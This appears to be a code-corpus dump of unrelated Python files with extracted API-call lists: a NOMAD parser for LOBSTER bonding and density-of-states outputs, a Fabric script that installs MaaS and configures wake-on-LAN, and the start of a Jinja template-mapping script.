] | [((486, 522), 'os.path.join', 'os.path.join', (['data_path', '"""meta.json"""'], {}), "(data_path, 'meta.json')\n", (498, 522), False, 'import os\n'), ((1047, 1080), 'os.path.join', 'os.path.join', (['data_path', '"""images"""'], {}), "(data_path, 'images')\n", (1059, 1080), False, 'import os\n'), ((1093, 1131), 'os.path.join', 'os.path.join', (['data_path', '"""annotations"""'], {}), "(data_path, 'annotations')\n", (1105, 1131), False, 'import os\n'), ((1147, 1193), 'os.path.join', 'os.path.join', (['data_path', '"""annotations_darknet"""'], {}), "(data_path, 'annotations_darknet')\n", (1159, 1193), False, 'import os\n'), ((1268, 1289), 'os.listdir', 'os.listdir', (['anno_path'], {}), '(anno_path)\n', (1278, 1289), False, 'import os\n'), ((2415, 2508), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Convert Supervisely format to Darknet-Yolo format"""'}), "(description=\n 'Convert Supervisely format to Darknet-Yolo format')\n", (2438, 2508), False, 'import argparse\n'), ((92, 114), 'cv2.imread', 'cv2.imread', (['im_file', '(0)'], {}), '(im_file, 0)\n', (102, 114), False, 'import cv2\n'), ((530, 560), 'os.path.isfile', 'os.path.isfile', (['meta_json_path'], {}), '(meta_json_path)\n', (544, 560), False, 'import os\n'), ((869, 906), 'os.path.join', 'os.path.join', (['data_path', '"""meta.names"""'], {}), "(data_path, 'meta.names')\n", (881, 906), False, 'import os\n'), ((1201, 1228), 'os.path.isdir', 'os.path.isdir', (['darknet_path'], {}), '(darknet_path)\n', (1214, 1228), False, 'import os\n'), ((1230, 1252), 'os.mkdir', 'os.mkdir', (['darknet_path'], {}), '(darknet_path)\n', (1238, 1252), False, 'import os\n'), ((268, 287), 'PIL.Image.open', 'Image.open', (['im_file'], {}), '(im_file)\n', (278, 287), False, 'from PIL import Image\n'), ((1514, 1548), 'os.path.join', 'os.path.join', (['images_path', 'im_file'], {}), '(images_path, im_file)\n', (1526, 1548), False, 'import os\n'), ((1396, 1423), 'os.path.join', 'os.path.join', (['anno_path', 'ap'], {}), '(anno_path, ap)\n', (1408, 1423), False, 'import os\n'), ((1558, 1582), 'os.path.isfile', 'os.path.isfile', (['rel_path'], {}), '(rel_path)\n', (1572, 1582), False, 'import os\n'), ((2255, 2295), 'os.path.join', 'os.path.join', (['darknet_path', 'darknet_anno'], {}), '(darknet_path, darknet_anno)\n', (2267, 2295), False, 'import os\n')] |
#
# Copyright The NOMAD Authors.
#
# This file is part of NOMAD. See https://nomad-lab.eu for further info.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import datetime
import numpy as np
import ase.io
from os import path
from nomad.datamodel import EntryArchive
from nomad.units import ureg as units
from nomad.datamodel.metainfo.simulation.run import Run, Program, TimeRun
from nomad.datamodel.metainfo.simulation.system import (
System, Atoms)
from nomad.datamodel.metainfo.simulation.method import (
Method, Electronic, BasisSet)
from nomad.datamodel.metainfo.simulation.calculation import (
Calculation, Dos, DosValues, Charges)
from nomad.parsing.file_parser import TextParser, Quantity
from .metainfo.lobster import x_lobster_section_cohp, x_lobster_section_coop
'''
This is a LOBSTER code parser.
'''
e = (1 * units.e).to_base_units().magnitude
eV = (1 * units.eV).to_base_units().magnitude
def parse_ICOXPLIST(fname, scc, method):
def icoxp_line_split(string):
tmp = string.split()
# LOBSTER version 3 and above
if len(tmp) == 8:
return [tmp[1], tmp[2], float(tmp[3]), [int(tmp[4]),
int(tmp[5]), int(tmp[6])], float(tmp[7])]
# LOBSTER versions below 3
elif len(tmp) == 6:
return [tmp[1], tmp[2], float(tmp[3]), float(tmp[4]), int(tmp[5])]
icoxplist_parser = TextParser(quantities=[
Quantity('icoxpslist_for_spin', r'\s*CO[OH]P.*spin\s*\d\s*([^#]+[-\d\.]+)',
repeats=True,
sub_parser=TextParser(quantities=[
Quantity('line',
# LOBSTER version 3 and above
r'(\s*\d+\s+\w+\s+\w+\s+[\.\d]+\s+[-\d]+\s+[-\d]+\s+[-\d]+\s+[-\.\d]+\s*)|'
# LOBSTER versions below 3
r'(\s*\d+\s+\w+\s+\w+\s+[\.\d]+\s+[-\.\d]+\s+[\d]+\s*)',
repeats=True, str_operation=icoxp_line_split)])
)
])
if not path.isfile(fname):
return
icoxplist_parser.mainfile = fname
icoxplist_parser.parse()
icoxp = []
for spin, icoxplist in enumerate(icoxplist_parser.get('icoxpslist_for_spin')):
lines = icoxplist.get('line')
if lines is None:
break
if type(lines[0][4]) is int:
a1, a2, distances, tmp, bonds = zip(*lines)
else:
a1, a2, distances, v, tmp = zip(*lines)
icoxp.append(0)
icoxp[-1] = list(tmp)
if spin == 0:
if method == 'o':
section = scc.m_create(x_lobster_section_coop)
elif method == 'h':
section = scc.m_create(x_lobster_section_cohp)
setattr(section, "x_lobster_number_of_co{}p_pairs".format(
method), len(list(a1)))
setattr(section, "x_lobster_co{}p_atom1_labels".format(
method), list(a1))
setattr(section, "x_lobster_co{}p_atom2_labels".format(
method), list(a2))
setattr(section, "x_lobster_co{}p_distances".format(
method), np.array(distances) * units.angstrom)
# version specific entries
if 'v' in locals():
setattr(section, "x_lobster_co{}p_translations".format(
method), list(v))
if 'bonds' in locals():
setattr(section, "x_lobster_co{}p_number_of_bonds".format(
method), list(bonds))
if len(icoxp) > 0:
setattr(section, "x_lobster_integrated_co{}p_at_fermi_level".format(
method), np.array(icoxp) * units.eV)
def parse_COXPCAR(fname, scc, method, logger):
coxpcar_parser = TextParser(quantities=[
Quantity('coxp_pairs', r'No\.\d+:(\w{1,2}\d+)->(\w{1,2}\d+)\(([\d\.]+)\)\s*?',
repeats=True),
Quantity('coxp_lines', r'\n\s*(-*\d+\.\d+(?:[ \t]+-*\d+\.\d+)+)',
repeats=True)
])
if not path.isfile(fname):
return
coxpcar_parser.mainfile = fname
coxpcar_parser.parse()
if method == 'o':
if not scc.x_lobster_section_coop:
section = scc.m_create(x_lobster_section_coop)
else:
section = scc.x_lobster_section_coop
elif method == 'h':
if not scc.x_lobster_section_cohp:
section = scc.m_create(x_lobster_section_cohp)
else:
section = scc.x_lobster_section_cohp
pairs = coxpcar_parser.get('coxp_pairs')
if pairs is None:
logger.warning('No CO{}P values detected in CO{}PCAR.lobster.'.format(
method.upper(), method.upper()))
return
a1, a2, distances = zip(*pairs)
number_of_pairs = len(list(a1))
setattr(section, "x_lobster_number_of_co{}p_pairs".format(
method), number_of_pairs)
setattr(section, "x_lobster_co{}p_atom1_labels".format(
method), list(a1))
setattr(section, "x_lobster_co{}p_atom2_labels".format(
method), list(a2))
setattr(section, "x_lobster_co{}p_distances".format(
method), np.array(distances) * units.angstrom)
coxp_lines = coxpcar_parser.get('coxp_lines')
if coxp_lines is None:
logger.warning('No CO{}P values detected in CO{}PCAR.lobster.'
'The file is likely incomplete'.format(
method.upper(), method.upper()))
return
coxp_lines = list(zip(*coxp_lines))
setattr(section, "x_lobster_number_of_co{}p_values".format(
method), len(coxp_lines[0]))
setattr(section, "x_lobster_co{}p_energies".format(
method), np.array(coxp_lines[0]) * units.eV)
if len(coxp_lines) == 2 * number_of_pairs + 3:
coxp = [[x] for x in coxp_lines[3::2]]
icoxp = [[x] for x in coxp_lines[4::2]]
acoxp = [coxp_lines[1]]
aicoxp = [coxp_lines[2]]
elif len(coxp_lines) == 4 * number_of_pairs + 5:
coxp = [x for x in zip(coxp_lines[5:number_of_pairs * 2 + 4:2],
coxp_lines[number_of_pairs * 2 + 5: 4 * number_of_pairs + 4:2])]
icoxp = [x for x in zip(coxp_lines[6:number_of_pairs * 2 + 5:2],
coxp_lines[number_of_pairs * 2 + 6: 4 * number_of_pairs + 5:2])]
acoxp = [coxp_lines[1], coxp_lines[3]]
aicoxp = [coxp_lines[2], coxp_lines[4]]
else:
logger.warning('Unexpected number of columns {} '
'in CO{}PCAR.lobster.'.format(len(coxp_lines),
method.upper()))
return
# FIXME: correct magnitude?
setattr(section, "x_lobster_co{}p_values".format(
method), np.array(coxp))
setattr(section, "x_lobster_average_co{}p_values".format(
method), np.array(acoxp))
setattr(section, "x_lobster_integrated_co{}p_values".format(
method), np.array(icoxp) * units.eV)
setattr(section, "x_lobster_average_integrated_co{}p_values".format(
method), np.array(aicoxp) * units.eV)
setattr(section, "x_lobster_integrated_co{}p_values".format(
method), np.array(icoxp) * units.eV)
def parse_CHARGE(fname, scc):
charge_parser = TextParser(quantities=[
Quantity(
'charges', r'\s*\d+\s+[A-Za-z]{1,2}\s+([-\d\.]+)\s+([-\d\.]+)\s*', repeats=True)
])
if not path.isfile(fname):
return
charge_parser.mainfile = fname
charge_parser.parse()
charges = charge_parser.get('charges')
if charges is not None:
sec_charges = scc.m_create(Charges)
sec_charges.analysis_method = "mulliken"
sec_charges.kind = "integrated"
sec_charges.value = np.array(list(zip(*charges))[0]) * units.elementary_charge
sec_charges = scc.m_create(Charges)
sec_charges.analysis_method = "loewdin"
sec_charges.kind = "integrated"
sec_charges.value = np.array(list(zip(*charges))[1]) * units.elementary_charge
def parse_DOSCAR(fname, run, logger):
def parse_species(run, atomic_numbers):
"""
If we don't have any structure from the underlying DFT code, we can
at least figure out what atoms we have in the structure. The best place
to get this info from is the DOSCAR.lobster
"""
if not run.system:
system = run.m_create(System)
system.atoms = Atoms(species=atomic_numbers, periodic=[True, True, True])
def translate_lm(lm):
lm_dictionary = {
's': [0, 0],
'p_z': [1, 0],
'p_x': [1, 1],
'p_y': [1, 2],
'd_z^2': [2, 0],
'd_xz': [2, 1],
'd_yz': [2, 2],
'd_xy': [2, 3],
'd_x^2-y^2': [2, 4],
'z^3': [3, 0],
'xz^2': [3, 1],
'yz^2': [3, 2],
'xyz': [3, 3],
'z(x^2-y^2)': [3, 4],
'x(x^2-3y^2)': [3, 5],
'y(3x^2-y^2)': [3, 6],
}
return lm_dictionary.get(lm[1:])
if not path.isfile(fname):
return
energies = []
dos_values = []
integral_dos = []
atom_projected_dos_values = []
atom_index = 0
n_atoms = 0
n_dos = 0
atomic_numbers = []
lms = []
with open(fname) as f:
for i, line in enumerate(f):
if i == 0:
n_atoms = int(line.split()[0])
if i == 1:
_ = float(line.split()[0]) * units.angstrom**3
if i == 5:
n_dos = int(line.split()[2])
if 'Z=' in line:
atom_index += 1
atom_projected_dos_values.append([])
lms.append((line.split(';')[-1]).split())
atomic_numbers.append(int(line.split(';')[-2].split('=')[1]))
continue
if i > 5:
line = [float(x) for x in line.split()]
if atom_index == 0:
energies.append(line[0])
if len(line) == 3:
dos_values.append([line[1]])
integral_dos.append([line[2]])
elif len(line) == 5:
dos_values.append([line[1], line[2]])
integral_dos.append([line[3], line[4]])
else:
atom_projected_dos_values[-1].append(line[1:])
if len(atomic_numbers) > 0 and len(atomic_numbers) == n_atoms:
parse_species(run, atomic_numbers)
if n_dos == 0:
return
if len(dos_values) == n_dos:
dos = run.calculation[0].m_create(Dos, Calculation.dos_electronic)
dos.n_energies = n_dos
dos.energies = energies * units.eV
value = list(zip(*dos_values))
n_electrons = sum(atomic_numbers)
index = (np.abs(energies)).argmin()
# integrated dos at the Fermi level should be the number of electrons
n_valence_electrons = int(round(sum(integral_dos[index])))
n_core_electrons = n_electrons - n_valence_electrons
value_integrated = np.array(list(zip(*integral_dos))) + n_core_electrons / len(integral_dos[0])
for spin_i in range(len(value)):
dos_total = dos.m_create(DosValues, Dos.total)
dos_total.spin = spin_i
dos_total.value = value[spin_i] * (1 / units.eV)
dos_total.value_integrated = value_integrated[spin_i]
else:
logger.warning('Unable to parse total dos from DOSCAR.lobster, \
it doesn\'t contain enough dos values')
return
for atom_i, pdos in enumerate(atom_projected_dos_values):
if len(pdos) != n_dos:
logger.warning('Unable to parse atom lm-projected dos from DOSCAR.lobster, \
it doesn\'t contain enough dos values')
continue
if len(lms[atom_i]) == len(pdos[0]):
# we have the same lm-projections for spin up and dn
dos_values = np.array([[lmdos] for lmdos in zip(*pdos)]) / eV
elif len(lms[atom_i]) * 2 == len(pdos[0]):
pdos_up = list(zip(*pdos))[0::2]
pdos_dn = list(zip(*pdos))[1::2]
dos_values = np.array([[a, b] for a, b in zip(pdos_up, pdos_dn)]) / eV
else:
logger.warning('Unexpected number of columns in DOSCAR.lobster')
return
for lm_i, lm in enumerate(lms[atom_i]):
for spin_i in range(len(dos_values[lm_i])):
section_pdos = dos.m_create(DosValues, Dos.atom_projected)
section_pdos.atom_index = atom_i
section_pdos.spin = spin_i
section_pdos.m_kind = 'real_orbital'
section_pdos.lm = translate_lm(lm)
section_pdos.value = dos_values[lm_i][spin_i]
mainfile_parser = TextParser(quantities=[
Quantity('program_version', r'^LOBSTER\s*v([\d\.]+)\s*', repeats=False),
Quantity('datetime', r'starting on host \S* on (\d{4}-\d\d-\d\d\sat\s\d\d:\d\d:\d\d)\s[A-Z]{3,4}',
repeats=False),
Quantity('x_lobster_code',
r'detecting used PAW program... (.*)', repeats=False),
Quantity('x_lobster_basis',
r'setting up local basis functions...\s*((?:[a-zA-Z]{1,2}\s+\(.+\)(?:\s+\d\S+)+\s+)+)',
repeats=False,
sub_parser=TextParser(quantities=[
Quantity('x_lobster_basis_species',
r'([a-zA-Z]+){1,2}\s+\((.+)\)((?:\s+\d\S+)+)\s+', repeats=True)
])),
Quantity('spilling', r'((?:spillings|abs. tot)[\s\S]*?charge\s*spilling:\s*\d+\.\d+%)',
repeats=True,
sub_parser=TextParser(quantities=[
Quantity('abs_total_spilling',
r'abs.\s*total\s*spilling:\s*(\d+\.\d+)%', repeats=False),
Quantity('abs_charge_spilling',
r'abs.\s*charge\s*spilling:\s*(\d+\.\d+)%', repeats=False)
])),
Quantity('finished', r'finished in (\d)', repeats=False),
])
class LobsterParser:
def __init__(self):
pass
def parse(self, mainfile: str, archive: EntryArchive, logger=None):
mainfile_parser.mainfile = mainfile
mainfile_path = path.dirname(mainfile)
mainfile_parser.parse()
run = archive.m_create(Run)
run.program = Program(
name='LOBSTER',
version=str(mainfile_parser.get('program_version')))
# FIXME: There is a timezone info present as well, but datetime support for timezones
# is bad and it doesn't support some timezones (for example CEST).
# That leads to test failures, so ignore it for now.
date = datetime.datetime.strptime(' '.join(mainfile_parser.get('datetime')),
'%Y-%m-%d at %H:%M:%S') - datetime.datetime(1970, 1, 1)
run.time_run = TimeRun(wall_start=date.total_seconds())
code = mainfile_parser.get('x_lobster_code')
# parse structure
if code is not None:
if code == 'VASP':
try:
structure = ase.io.read(mainfile_path + '/CONTCAR', format="vasp")
except FileNotFoundError:
logger.warning('Unable to parse structure info, no CONTCAR detected')
else:
logger.warning('Parsing of {} structure is not supported'.format(code))
if 'structure' in locals():
system = run.m_create(System)
system.atoms = Atoms(
lattice_vectors=structure.get_cell() * units.angstrom,
labels=structure.get_chemical_symbols(),
periodic=structure.get_pbc(),
positions=structure.get_positions() * units.angstrom)
if mainfile_parser.get('finished') is not None:
run.clean_end = True
else:
run.clean_end = False
scc = run.m_create(Calculation)
method = run.m_create(Method)
scc.method_ref = method
spilling = mainfile_parser.get('spilling')
if spilling is not None:
method.electronic = Electronic(n_spin_channels=len(spilling))
total_spilling = []
charge_spilling = []
for s in spilling:
total_spilling.append(s.get('abs_total_spilling'))
charge_spilling.append(s.get('abs_charge_spilling'))
scc.x_lobster_abs_total_spilling = np.array(total_spilling)
scc.x_lobster_abs_charge_spilling = np.array(charge_spilling)
method_keys = [
'x_lobster_code'
]
for key in method_keys:
val = mainfile_parser.get(key)
if val is not None:
setattr(method, key, val)
basis = mainfile_parser.get('x_lobster_basis')
if basis is not None:
species = basis.get('x_lobster_basis_species')
if species is not None:
method.basis_set.append(BasisSet(name=species[0][1]))
parse_ICOXPLIST(mainfile_path + '/ICOHPLIST.lobster', scc, 'h')
parse_ICOXPLIST(mainfile_path + '/ICOOPLIST.lobster', scc, 'o')
parse_COXPCAR(mainfile_path + '/COHPCAR.lobster', scc, 'h', logger)
parse_COXPCAR(mainfile_path + '/COOPCAR.lobster', scc, 'o', logger)
parse_CHARGE(mainfile_path + '/CHARGE.lobster', scc)
parse_DOSCAR(mainfile_path + '/DOSCAR.lobster', run, logger)
if run.system:
scc.system_ref = run.system[0]
| [
"datetime.datetime",
"numpy.abs",
"nomad.datamodel.metainfo.simulation.method.BasisSet",
"os.path.isfile",
"numpy.array",
"os.path.dirname",
"nomad.datamodel.metainfo.simulation.system.Atoms",
"nomad.parsing.file_parser.Quantity"
] | [((2539, 2557), 'os.path.isfile', 'path.isfile', (['fname'], {}), '(fname)\n', (2550, 2557), False, 'from os import path\n'), ((4514, 4532), 'os.path.isfile', 'path.isfile', (['fname'], {}), '(fname)\n', (4525, 4532), False, 'from os import path\n'), ((7185, 7199), 'numpy.array', 'np.array', (['coxp'], {}), '(coxp)\n', (7193, 7199), True, 'import numpy as np\n'), ((7280, 7295), 'numpy.array', 'np.array', (['acoxp'], {}), '(acoxp)\n', (7288, 7295), True, 'import numpy as np\n'), ((7842, 7860), 'os.path.isfile', 'path.isfile', (['fname'], {}), '(fname)\n', (7853, 7860), False, 'from os import path\n'), ((9504, 9522), 'os.path.isfile', 'path.isfile', (['fname'], {}), '(fname)\n', (9515, 9522), False, 'from os import path\n'), ((14707, 14729), 'os.path.dirname', 'path.dirname', (['mainfile'], {}), '(mainfile)\n', (14719, 14729), False, 'from os import path\n'), ((5614, 5633), 'numpy.array', 'np.array', (['distances'], {}), '(distances)\n', (5622, 5633), True, 'import numpy as np\n'), ((6154, 6177), 'numpy.array', 'np.array', (['coxp_lines[0]'], {}), '(coxp_lines[0])\n', (6162, 6177), True, 'import numpy as np\n'), ((7379, 7394), 'numpy.array', 'np.array', (['icoxp'], {}), '(icoxp)\n', (7387, 7394), True, 'import numpy as np\n'), ((7497, 7513), 'numpy.array', 'np.array', (['aicoxp'], {}), '(aicoxp)\n', (7505, 7513), True, 'import numpy as np\n'), ((7608, 7623), 'numpy.array', 'np.array', (['icoxp'], {}), '(icoxp)\n', (7616, 7623), True, 'import numpy as np\n'), ((8863, 8921), 'nomad.datamodel.metainfo.simulation.system.Atoms', 'Atoms', ([], {'species': 'atomic_numbers', 'periodic': '[True, True, True]'}), '(species=atomic_numbers, periodic=[True, True, True])\n', (8868, 8921), False, 'from nomad.datamodel.metainfo.simulation.system import System, Atoms\n'), ((13315, 13389), 'nomad.parsing.file_parser.Quantity', 'Quantity', (['"""program_version"""', '"""^LOBSTER\\\\s*v([\\\\d\\\\.]+)\\\\s*"""'], {'repeats': '(False)'}), "('program_version', '^LOBSTER\\\\s*v([\\\\d\\\\.]+)\\\\s*', repeats=False)\n", (13323, 13389), False, 'from nomad.parsing.file_parser import TextParser, Quantity\n'), ((13392, 13528), 'nomad.parsing.file_parser.Quantity', 'Quantity', (['"""datetime"""', '"""starting on host \\\\S* on (\\\\d{4}-\\\\d\\\\d-\\\\d\\\\d\\\\sat\\\\s\\\\d\\\\d:\\\\d\\\\d:\\\\d\\\\d)\\\\s[A-Z]{3,4}"""'], {'repeats': '(False)'}), "('datetime',\n 'starting on host \\\\S* on (\\\\d{4}-\\\\d\\\\d-\\\\d\\\\d\\\\sat\\\\s\\\\d\\\\d:\\\\d\\\\d:\\\\d\\\\d)\\\\s[A-Z]{3,4}'\n , repeats=False)\n", (13400, 13528), False, 'from nomad.parsing.file_parser import TextParser, Quantity\n'), ((13524, 13603), 'nomad.parsing.file_parser.Quantity', 'Quantity', (['"""x_lobster_code"""', '"""detecting used PAW program... (.*)"""'], {'repeats': '(False)'}), "('x_lobster_code', 'detecting used PAW program... (.*)', repeats=False)\n", (13532, 13603), False, 'from nomad.parsing.file_parser import TextParser, Quantity\n'), ((14445, 14501), 'nomad.parsing.file_parser.Quantity', 'Quantity', (['"""finished"""', '"""finished in (\\\\d)"""'], {'repeats': '(False)'}), "('finished', 'finished in (\\\\d)', repeats=False)\n", (14453, 14501), False, 'from nomad.parsing.file_parser import TextParser, Quantity\n'), ((15307, 15336), 'datetime.datetime', 'datetime.datetime', (['(1970)', '(1)', '(1)'], {}), '(1970, 1, 1)\n', (15324, 15336), False, 'import datetime\n'), ((16930, 16954), 'numpy.array', 'np.array', (['total_spilling'], {}), '(total_spilling)\n', (16938, 16954), True, 'import numpy as np\n'), ((17003, 17028), 'numpy.array', 'np.array', (['charge_spilling'], {}), '(charge_spilling)\n', (17011, 17028), True, 'import numpy as np\n'), ((4149, 4164), 'numpy.array', 'np.array', (['icoxp'], {}), '(icoxp)\n', (4157, 4164), True, 'import numpy as np\n'), ((4279, 4389), 'nomad.parsing.file_parser.Quantity', 'Quantity', (['"""coxp_pairs"""', '"""No\\\\.\\\\d+:(\\\\w{1,2}\\\\d+)->(\\\\w{1,2}\\\\d+)\\\\(([\\\\d\\\\.]+)\\\\)\\\\s*?"""'], {'repeats': '(True)'}), "('coxp_pairs',\n 'No\\\\.\\\\d+:(\\\\w{1,2}\\\\d+)->(\\\\w{1,2}\\\\d+)\\\\(([\\\\d\\\\.]+)\\\\)\\\\s*?',\n repeats=True)\n", (4287, 4389), False, 'from nomad.parsing.file_parser import TextParser, Quantity\n'), ((4398, 4489), 'nomad.parsing.file_parser.Quantity', 'Quantity', (['"""coxp_lines"""', '"""\\\\n\\\\s*(-*\\\\d+\\\\.\\\\d+(?:[ \\\\t]+-*\\\\d+\\\\.\\\\d+)+)"""'], {'repeats': '(True)'}), "('coxp_lines', '\\\\n\\\\s*(-*\\\\d+\\\\.\\\\d+(?:[ \\\\t]+-*\\\\d+\\\\.\\\\d+)+)',\n repeats=True)\n", (4406, 4489), False, 'from nomad.parsing.file_parser import TextParser, Quantity\n'), ((7720, 7826), 'nomad.parsing.file_parser.Quantity', 'Quantity', (['"""charges"""', '"""\\\\s*\\\\d+\\\\s+[A-Za-z]{1,2}\\\\s+([-\\\\d\\\\.]+)\\\\s+([-\\\\d\\\\.]+)\\\\s*"""'], {'repeats': '(True)'}), "('charges',\n '\\\\s*\\\\d+\\\\s+[A-Za-z]{1,2}\\\\s+([-\\\\d\\\\.]+)\\\\s+([-\\\\d\\\\.]+)\\\\s*',\n repeats=True)\n", (7728, 7826), False, 'from nomad.parsing.file_parser import TextParser, Quantity\n'), ((11273, 11289), 'numpy.abs', 'np.abs', (['energies'], {}), '(energies)\n', (11279, 11289), True, 'import numpy as np\n'), ((3654, 3673), 'numpy.array', 'np.array', (['distances'], {}), '(distances)\n', (3662, 3673), True, 'import numpy as np\n'), ((17464, 17492), 'nomad.datamodel.metainfo.simulation.method.BasisSet', 'BasisSet', ([], {'name': 'species[0][1]'}), '(name=species[0][1])\n', (17472, 17492), False, 'from nomad.datamodel.metainfo.simulation.method import Method, Electronic, BasisSet\n'), ((13845, 13954), 'nomad.parsing.file_parser.Quantity', 'Quantity', (['"""x_lobster_basis_species"""', '"""([a-zA-Z]+){1,2}\\\\s+\\\\((.+)\\\\)((?:\\\\s+\\\\d\\\\S+)+)\\\\s+"""'], {'repeats': '(True)'}), "('x_lobster_basis_species',\n '([a-zA-Z]+){1,2}\\\\s+\\\\((.+)\\\\)((?:\\\\s+\\\\d\\\\S+)+)\\\\s+', repeats=True)\n", (13853, 13954), False, 'from nomad.parsing.file_parser import TextParser, Quantity\n'), ((14173, 14270), 'nomad.parsing.file_parser.Quantity', 'Quantity', (['"""abs_total_spilling"""', '"""abs.\\\\s*total\\\\s*spilling:\\\\s*(\\\\d+\\\\.\\\\d+)%"""'], {'repeats': '(False)'}), "('abs_total_spilling',\n 'abs.\\\\s*total\\\\s*spilling:\\\\s*(\\\\d+\\\\.\\\\d+)%', repeats=False)\n", (14181, 14270), False, 'from nomad.parsing.file_parser import TextParser, Quantity\n'), ((14306, 14405), 'nomad.parsing.file_parser.Quantity', 'Quantity', (['"""abs_charge_spilling"""', '"""abs.\\\\s*charge\\\\s*spilling:\\\\s*(\\\\d+\\\\.\\\\d+)%"""'], {'repeats': '(False)'}), "('abs_charge_spilling',\n 'abs.\\\\s*charge\\\\s*spilling:\\\\s*(\\\\d+\\\\.\\\\d+)%', repeats=False)\n", (14314, 14405), False, 'from nomad.parsing.file_parser import TextParser, Quantity\n'), ((2096, 2329), 'nomad.parsing.file_parser.Quantity', 'Quantity', (['"""line"""', '"""(\\\\s*\\\\d+\\\\s+\\\\w+\\\\s+\\\\w+\\\\s+[\\\\.\\\\d]+\\\\s+[-\\\\d]+\\\\s+[-\\\\d]+\\\\s+[-\\\\d]+\\\\s+[-\\\\.\\\\d]+\\\\s*)|(\\\\s*\\\\d+\\\\s+\\\\w+\\\\s+\\\\w+\\\\s+[\\\\.\\\\d]+\\\\s+[-\\\\.\\\\d]+\\\\s+[\\\\d]+\\\\s*)"""'], {'repeats': '(True)', 'str_operation': 'icoxp_line_split'}), "('line',\n '(\\\\s*\\\\d+\\\\s+\\\\w+\\\\s+\\\\w+\\\\s+[\\\\.\\\\d]+\\\\s+[-\\\\d]+\\\\s+[-\\\\d]+\\\\s+[-\\\\d]+\\\\s+[-\\\\.\\\\d]+\\\\s*)|(\\\\s*\\\\d+\\\\s+\\\\w+\\\\s+\\\\w+\\\\s+[\\\\.\\\\d]+\\\\s+[-\\\\.\\\\d]+\\\\s+[\\\\d]+\\\\s*)'\n , repeats=True, str_operation=icoxp_line_split)\n", (2104, 2329), False, 'from nomad.parsing.file_parser import TextParser, Quantity\n')] |
##
# Fabric module to deploy MaaS. Run as root user.
#
import os
import sys
import time
import logging
from fabric.api import *
from fabric.operations import reboot
from fabric.colors import cyan, green, red
from fabric.context_managers import shell_env
from fabric.contrib.files import append, sed, comment
from fabric.decorators import hosts, parallel, serial
logging.basicConfig(level=logging.ERROR)
para_log = logging.getLogger('paramiko.transport')
para_log.setLevel(logging.ERROR)
env.roledefs = { 'controller' : ['hostname@ipaddress'] }
@roles('controller')
def install_maas():
"""Installs MaaS on a remote machine."""
sudo('add-apt-repository ppa:maas-maintainers/stable')
sudo('apt-get update')
sudo('apt-get install -y maas maas-dhcp maas-dns')
path_to_configs = '/home/user/maas'
answer = 'unknown'
while answer != 'y' or answer != 'n':
eth_name = raw_input("Please specify ethernet device name for wakeonlan: ")
print(cyan('Ethernet device for wakeonlan is set to: ' + eth_name))
answer = raw_input("Correct? [y/n]:")
if answer == 'y':
put(path_to_configs + '/ether_wake.template', '/tmp/ether_wake.template')
config_file = '/tmp/ether_wake.template'
searchExp = '/usr/sbin/etherwake \$mac_address'
replaceExp = 'sudo /usr/sbin/etherwake -i ' + eth_name + ' \$mac_address'
sed(config_file, searchExp, replaceExp)
sudo('mv /tmp/ether_wake.template /etc/maas/templates/power/ether_wake.template')
run('rm -rf ' + config_file + '.bak')
put(path_to_configs + '/99-maas-sudoers', '/tmp/99-maas-sudoers')
config_file = '/tmp/99-maas-sudoers'
text = 'maas ALL= NOPASSWD: /usr/sbin/etherwake'
append(config_file, text, use_sudo=True, partial=True, escape=True, shell=False)
sudo('mv /tmp/99-maas-sudoers /etc/sudoers.d/99-maas-sudoers')
run('rm -rf ' + config_file + '.bak')
print(green('Wakeonlan configured. Maas is installed properly.'))
return
else:
print(green('Maas is installed properly.'))
print(red('Alert: Didn\'t setup wakeonlan. Hit possibility of not being able to do wakeonlan properly.\nPlease do manual configuration!'))
return
| [
"logging.basicConfig",
"logging.getLogger",
"fabric.colors.green",
"fabric.colors.red",
"fabric.contrib.files.sed",
"fabric.contrib.files.append",
"fabric.colors.cyan"
] | [((365, 405), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.ERROR'}), '(level=logging.ERROR)\n', (384, 405), False, 'import logging\n'), ((417, 456), 'logging.getLogger', 'logging.getLogger', (['"""paramiko.transport"""'], {}), "('paramiko.transport')\n", (434, 456), False, 'import logging\n'), ((946, 1006), 'fabric.colors.cyan', 'cyan', (["('Ethernet device for wakeonlan is set to: ' + eth_name)"], {}), "('Ethernet device for wakeonlan is set to: ' + eth_name)\n", (950, 1006), False, 'from fabric.colors import cyan, green, red\n'), ((1320, 1359), 'fabric.contrib.files.sed', 'sed', (['config_file', 'searchExp', 'replaceExp'], {}), '(config_file, searchExp, replaceExp)\n', (1323, 1359), False, 'from fabric.contrib.files import append, sed, comment\n'), ((1650, 1735), 'fabric.contrib.files.append', 'append', (['config_file', 'text'], {'use_sudo': '(True)', 'partial': '(True)', 'escape': '(True)', 'shell': '(False)'}), '(config_file, text, use_sudo=True, partial=True, escape=True, shell=False\n )\n', (1656, 1735), False, 'from fabric.contrib.files import append, sed, comment\n'), ((1847, 1905), 'fabric.colors.green', 'green', (['"""Wakeonlan configured. Maas is installed properly."""'], {}), "('Wakeonlan configured. Maas is installed properly.')\n", (1852, 1905), False, 'from fabric.colors import cyan, green, red\n'), ((1934, 1970), 'fabric.colors.green', 'green', (['"""Maas is installed properly."""'], {}), "('Maas is installed properly.')\n", (1939, 1970), False, 'from fabric.colors import cyan, green, red\n'), ((1981, 2119), 'fabric.colors.red', 'red', (['"""Alert: Didn\'t setup wakeonlan. Hit possibility of not being able to do wakeonlan properly.\nPlease do manual configuration!"""'], {}), '("""Alert: Didn\'t setup wakeonlan. Hit possibility of not being able to do wakeonlan properly.\nPlease do manual configuration!"""\n )\n', (1984, 2119), False, 'from fabric.colors import cyan, green, red\n')] |
import re
from dateutil.parser import parse
from vessel import Vessel,Forum,InvalidVesselException,engine,session
from tqdm import tqdm
import urllib.request
import codecs
program_to_jinja={
"children count": "vessel.children|length",
"children random":"(vessel.children|random).name",
"children list":"('\n - '~(vessel.children|lformat('{full_name_with_id} by {owner.full_name_with_id}')|join('\n - ') ) ) if vessel.children",
